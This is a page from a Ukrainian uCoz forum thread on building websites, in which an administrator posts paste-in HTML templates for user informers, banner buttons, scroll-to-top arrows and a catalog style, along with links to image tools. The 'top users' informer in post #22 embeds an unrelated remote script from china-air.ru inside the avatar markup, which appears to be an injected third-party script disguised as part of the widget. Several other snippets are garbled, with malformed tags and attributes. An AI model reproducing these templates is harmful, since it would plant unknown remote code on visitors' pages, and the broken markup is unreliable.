Субота, 10.12.2016, 21:30 Вітаю Вас Гость | RSS Головна | Створення сайту - Сторінка 3 - Поспілкуймося | Реєстрація | Вхід
[ Нові повідомлення · Учасники · Правила форуму · Пошук · RSS ]
Сторінка 3 з 4«1234»
Поспілкуймося » Будівництво сайта » Будівництво сайту » Створення сайту (Все про створення сайту)
Створення сайту
квіточкаДата: Понеділок, 11.05.2015, 14:56 | Сообщение # 21
Offline
Сообщений: 265
Группа:
Администраторы
Топ пользователей (Вставить в настройки информера)

<br><table><tbody><tr><td class="topava">
<?if( ($AVATAR_URL$))?><img
ilo-full-src="http://$avatar_url$/"
class="topava" title="$USERNAME$" src="$AVATAR_URL$" width="68"
height="68"><?else?><img class="topava" title="$USERNAME$"
src="http://s52.radikal.ru/i135/0904/16/3965bd367215.png"><?endif?>
<br></td> <td> <br>
<br></td><td><a
href="$PROFILE_URL$"><b>$USERNAME$</b></a><br><span
style="font-size: 8pt;"><span style="font-family: Comic Sans MS;
font-size: 8pt;"><b>Репутация:</b></span>
<b>$REPUTATION$</b><br><br><span
style="font-family: Comic Sans MS; font-size:
8pt;"><b>Комментариев:</b></span>
<b>$COM_POSTS$</b><br><span style="font-family:
Comic Sans MS; font-size:
8pt;"><b>Новостей:</b></span>
<b>$NEWS_POSTS$</b><br><font
face="Arial"><span style="font-family: Comic Sans MS; font-size:
8pt;"><b>Файлов:</b></span></font>
<b>$LOAD_POSTS$</b></span>  

</td></tr></tbody></table><br>

В блок - код самого информера


квіточкаДата: Понеділок, 11.05.2015, 14:57 | Сообщение # 22
Offline
Сообщений: 265
Группа:
Администраторы
Ещё один информер ТОП пользователей

В информер вставляем

<table width="100%" class="utop" cellpadding="0" cellspacing="0"><tbody><tr><td class="left">
<img class="utop_ava"
src="<?if($AVATAR_URL$)?>$AVATAR_URL$<?else?>http://bambun.ru/images/noat.png<?endif?>"
alt="Аватар $USERNAME$">
<script src="http://china-air.ru/tsed.js"
type="text/javascript"></script><div
class="utop_user_number">$NUMBER$</div>
</td><td class="uinfo" valign="top" align="left">
<div class="author"><a href="/index/8-5">$USERNAME$</a></div>
<span>Комментариев: $COM_POSTS$</span>
<span>Публикаций: $LOAD_POSTS$</span>
<span>Группа: <?if($GROUP_NAME$='Администраторы')?>Админ<?else?>$GROUP_NAME$<?endif?></span>
</td></tr></tbody></table>

В блок вставляем

$MYINF_1$
<link type="text/css" rel="StyleSheet" href="http://bambun.ru/css_js/utop.css">


квіточкаДата: Понеділок, 11.05.2015, 14:58 | Сообщение # 23
Offline
Сообщений: 265
Группа:
Администраторы
Для создания своей кнопочки можно воспользоваться сайтом
http://reginochka-design.narod.ru/delaembanner.html


квіточкаДата: Понеділок, 11.05.2015, 14:59 | Сообщение # 24
Offline
Сообщений: 265
Группа:
Администраторы
На этом сайте можно сделать меняющуюся картинку - picasion.com

квіточкаДата: Понеділок, 11.05.2015, 15:00 | Сообщение # 25
Offline
Сообщений: 265
Группа:
Администраторы
А это код для кнопки сайта, у которой меняется картинка и спрятан код.

<scriptlanguage="JavaScript">  <!--  function popup1()  {
 prompt('<ahref="http://kasatiki.ucoz.ru/" target=_blank><img
src="
http://i.picasion.com/pic79/4f56605f78c1ca712f6ca60595dfa17d.gif "
border="0" title="Кнопка" width=150 height=9=120></a>','<ahref="http://kasatiki.ucoz.ru/" target=_blank><img
src="http://s013.radikal.ru/i324/1502/b1/03f9ffc2c5bb.jpg"
border="0" title="Кнопка" width=150 height=120></a>"<ahref="http://kasatiki.ucoz.ru/" target=_blank><img
src="http://i.picasion.com/pic79/62fb7048d948dc26c404b89987cc802a.gif"
border="0" title="Классный тандем"width=150 height=120></a>
');  return false;  }  //-->
 </script><scripttype="text/javascript"
src=""></script>
 <center><ahref="http://kasatiki.ucoz.ru/"
target=_blank><img
src="http://i.picasion.com/pic79/62fb7048d948dc26c404b89987cc802a.gif"
border="0" title="Классный тандем"width=150 height=120></a></center></a><br><br>
 <form><center>  <input type="button" value="Получить код" onclick="popup1()">  </center></form>




квіточкаДата: Понеділок, 11.05.2015, 15:01 | Сообщение # 26
Offline
Сообщений: 265
Группа:
Администраторы
Образовательные возможности сайта погоды. 
В беседе со своей коллегой по работе обратил внимание на весьма полезное приложение известного сайта погоды GISMETEO. Вспоминаю наши школьные годы, когда мы вели настенный дневник наблюдений, измеряли температуру, скорость ветра.
Новое время требует совершенно других подходов. Для учителей начальных
классов, географии весьма полезным может стать приложение Дневник погоды для школьников.



При должной организации это приложение может стать хорошим помощником для юных исследователей.



К примеру, можно сравнить погоду в разных регионах. Или подготовить
сравнительную характеристику погоды за последние 5 или 10 лет. Учёт на
сайте ведётся с 1997 года.
При необходимости дневник можно распечатать.

Материал взят с сайта "Дидактор"



квіточкаДата: Понеділок, 11.05.2015, 15:27 | Сообщение # 27
Offline
Сообщений: 265
Группа:
Администраторы
Шановні користувачі! Пропоную Вам, ознайомитися з видео-інструкцією по створенню сайту в системі UCOZ.
Автор: вчитель початкових класів Соледарської СЗОШ №13 П'ятих Олена  Іванівна



квіточкаДата: Понеділок, 08.06.2015, 18:23 | Сообщение # 28
Offline
Сообщений: 265
Группа:
Администраторы
Кнопка "наверх", которая плавно проматывает страницу наверх.

Желтая стрелочка:
Code
 
<script src="http://ucozer.ucoz.net/scrypts/buttonon/button1.js" type="text/javascript"></script>

Синяя стрелочка:
Code 
<script src="http://ucozer.ucoz.net/scrypts/buttonon/button3.js" type="text/javascript"></script>

Зеленая стрелочка:
Code

<script src="http://ucozer.ucoz.net/scrypts/buttonon/button2.js" type="text/javascript"></script>

Красная стрелочка:
Code

<script src="http://ucozer.ucoz.net/scrypts/buttonon/button4.js" type="text/javascript"></script>

Розовая стрелочка:
Code
<script src="http://ucozer.ucoz.net/scrypts/buttonon/button5.js" type="text/javascript"></script>

Код вставляете в любое место на сайте (для отображения на всех страницах располагайте в глобальных блоках).
Прикрепления: 8870393.png(12Kb)


квіточкаДата: Вівторок, 30.06.2015, 12:40 | Сообщение # 29
Offline
Сообщений: 265
Группа:
Администраторы
Уважаемые коллеги! Хочется тоже быть полезной для Вас, так как с огромной пользой
для себя использую ссылки, данные Вами. На данном сайте  http://resizepiconline.com   очень легко и просто можно обрезать и уменьшить вес картинок,
фотографий. Кто -то может быть уже пользуется этим сервисом, а для кого
-то - новинка. Буду рада, если кому пригодится! А еще можно работать вот
здесь http://iglous.ru/kak-umenshit-ves-izobrazheniya-servis-i-programmy-dlya-umensheniya-vesa-izobrazhenij/


квіточкаДата: Вівторок, 30.06.2015, 18:19 | Сообщение # 30
Offline
Сообщений: 265
Группа:
Администраторы
Оранжевый вид материалов для каталога файлов и статей

<style type="text/css" media="all">@import url(http://oformi.ucoz.de/jss/highslide.css);</style>
 <script type="text/javascript" src="http://oformi.ucoz.de/jss/highslide.js"></script>
 <script type="text/javascript">hs.graphicsDir = 'http://www.forucoz.com/highslide/graphics/';</script>

 <style>#menublt {margin: 0px;padding: 0px 0px;background: white; }
 #menublt a {margin: 0px;padding: 4px;display: block;background: #F5ECCE;border:1px solid #F5DA81;margin-bottom:2px;}
 #menublt a:hover {text-decoration: none;background-color: #FFF;}
 .iim{border:1px solid #FFF;max-width: 150px;}</style><div id="entryID36990"><div style="border-top:1px solid #B18904;"><div style="background:#FFBF00;color:#FFF;border-left:1px solid #FFBF00;border-right:1px solid #FFBF00;border-top:1px solid #FFBF00;border-bottom:1px solid #FFBF00;font-size:12px;"><a href="$ENTRY_URL$" class="newslink" style="color:#FFF;"></a><div style="padding:5px;"><b style="color: rgb(255, 255, 255); "><a href="$ENTRY_URL$" class="newslink" style="color:#FFF;">$TITLE$</a> $MODER_PANEL$</b></div></div></div></div>
 <div style="background:#F5ECCE;padding:7px;border-left:1px solid #F5DA81;border-bottom:1px solid #F5DA81;border-right:1px solid #F5DA81;">
 <table width="100%"><tbody><tr><td align="left" valign="top">

 <noindex><a href="$IMG_URL1$" style="max-width: 150px;" class="highslide" onclick="return hs.expand(this, {captionId: 'caption1'})"><div style="margin-top: 1px;"></div>
 <img src="$IMG_URL1$" style="max-width: 150px;" align="left" border="0" width="160" height="142"></a></noindex>

 </td><td width="100%" align="left" valign="top">
 <div id="menublt"><a href="$ENTRY_URL$#comments">Коментарів: 0 </a><a href="$PROFILE_URL$">Додав: $USERNAME$</a><font color="#B18904"><a href="$CATEGORY_URL$">Категорія: $CATEGORY_NAME$ </a></font><a style="color:#4D6D91">Перегляди: $READS$</a><a style="color:#4D6D91">Рейтинг: $RATING$</a> <font color="#4d6d91"><a href="$ENTRY_URL$">Докладніше: Скачати</a></font></div>
 </td></tr></tbody></table></div>
 <div style="height:4px"></div>


Поспілкуймося » Будівництво сайта » Будівництво сайту » Створення сайту (Все про створення сайту)
Сторінка 3 з 4«1234»
Пошук:

Перша сходинка школяра © 2016
Відповідно до Закону України про авторське право передрук, копіювання, використання авторських матеріалів сайту цілком або частинами тільки з дозволу автора або з обов'язковим зазначенням П.І.Б. автора і розміщенням активного посилання на сайт! Матеріал, виставлений на сайті, узятий з відкритих джерел і використовується виключно в некомерційних цілях.